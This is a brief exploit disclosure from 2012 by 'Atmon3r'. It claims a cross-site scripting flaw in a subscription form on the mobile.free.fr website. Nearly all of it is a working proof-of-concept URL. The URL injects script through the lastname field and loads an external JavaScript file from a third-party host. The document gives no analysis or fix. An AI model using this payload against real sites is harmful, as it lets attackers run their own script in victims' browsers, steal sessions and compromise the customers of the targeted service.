+-------------------------------------------------------------------------+ # Exploit Title : Mobile.free.fr - Website XSS (Cross Site Scripting) # Author : Atmon3r # Date : 02/03/2012 # Editor : Mobile.free.fr # Perso : T'as free? t'as tout compris (http://www.dailymotion.com/embed/video/xchi4d) # Xss type : $_POST +-------------------------------------------------------------------------+ [+] POC: https://mobile.free.fr/subscribea/n_coordonnees.php?offre=n_illimite&freetelecom=strikeback&orderTunnelForm=orderTunnelForm&orderTunnelForm%3Agender=M&orderTunnelForm%3Alastname=/"><script>alert('Xss By Atm0n3r')</script><script type="text/javascript" src="http://vuln.xssed.net/thirdparty/scripts/ckers.org.js"></script>